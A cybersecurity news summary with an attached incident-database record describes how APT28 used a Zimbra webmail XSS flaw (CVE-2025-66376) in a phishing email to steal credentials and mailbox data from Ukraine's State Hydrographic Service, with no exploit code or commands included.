Russian APT28 Exploits Zimbra Flaw in Stealthy Phishing Attack on Ukrainian Agency
A Russian state-backed hacking group, APT28 (also known as Fancy Bear), targeted Ukraine’s State Hydrographic Service in a sophisticated phishing campaign exploiting a cross-site scripting (XSS) vulnerability in Zimbra webmail. The attack, uncovered by cybersecurity firm Seqrite, leveraged CVE-2025-66376 to inject malicious code into an email’s HTML body, bypassing traditional security measures.
Unlike conventional phishing attempts, the email contained no malicious attachments or links. Instead, it appeared as a routine internship inquiry in Ukrainian, with the exploit embedded directly in the message. When opened in an active Zimbra session, the code executed silently, enabling attackers to harvest login credentials, session tokens, backup 2FA codes, stored passwords, and up to 90 days of mailbox data.
The malicious email was sent in January 2025 from a compromised student account. By exploiting a trusted webmail environment, APT28 evaded detection, intercepting authenticated sessions without deploying malware or triggering standard defenses.
APT28, linked to Russia’s military intelligence, has a history of targeting Ukrainian and Western government entities, defense contractors, and logistics networks. Recent research also tied the group to operations involving new malware strains, BadPaw and MeowMeow. Zimbra webmail has been a recurring target for Russian-linked groups, including APT29 and Winter Vivern, in espionage campaigns across Eastern Europe.
Source: https://therecord.media/russia-hackers-ukraine-zimbra-breach
Zimbra cybersecurity rating report: https://www.rankiteo.com/company/zimbra
State Hydrographic Service of Ukraine cybersecurity rating report: https://www.rankiteo.com/company/state-hydrographic-service-of-ukraine
"id": "ZIMSTA1773930456",
"linkid": "zimbra, state-hydrographic-service-of-ukraine",
"type": "Vulnerability",
"date": "1/2026",
"severity": "85",
"impact": "4",
"explanation": "Attack with significant impact with customers data leaks"{'affected_entities': [{'industry': 'Maritime, Hydrography',
'location': 'Ukraine',
'name': 'Ukraine’s State Hydrographic Service',
'type': 'Government Agency'}],
'attack_vector': 'Cross-site scripting (XSS) in Zimbra webmail',
'data_breach': {'data_exfiltration': 'Yes',
'personally_identifiable_information': 'Yes',
'sensitivity_of_data': 'High',
'type_of_data_compromised': 'Credentials, Session Tokens, 2FA '
'Codes, Emails'},
'description': 'A Russian state-backed hacking group, APT28 (also known as '
'Fancy Bear), targeted Ukraine’s State Hydrographic Service in '
'a sophisticated phishing campaign exploiting a cross-site '
'scripting (XSS) vulnerability in Zimbra webmail. The attack '
'leveraged CVE-2025-66376 to inject malicious code into an '
'email’s HTML body, bypassing traditional security measures. '
'The email contained no malicious attachments or links but '
'executed silently when opened in an active Zimbra session, '
'enabling attackers to harvest login credentials, session '
'tokens, backup 2FA codes, stored passwords, and up to 90 days '
'of mailbox data.',
'impact': {'data_compromised': 'Login credentials, session tokens, backup 2FA '
'codes, stored passwords, 90 days of mailbox '
'data',
'identity_theft_risk': 'High',
'systems_affected': 'Zimbra webmail'},
'initial_access_broker': {'entry_point': 'Compromised student email account'},
'motivation': 'Espionage, Data Theft',
'post_incident_analysis': {'root_causes': 'Exploitation of Zimbra XSS '
'vulnerability (CVE-2025-66376), '
'lack of detection for embedded '
'malicious code in emails'},
'references': [{'source': 'Seqrite'}],
'response': {'third_party_assistance': 'Seqrite (cybersecurity firm)'},
'threat_actor': 'APT28 (Fancy Bear)',
'title': 'Russian APT28 Exploits Zimbra Flaw in Stealthy Phishing Attack on '
'Ukrainian Agency',
'type': 'Phishing, Espionage',
'vulnerability_exploited': 'CVE-2025-66376'}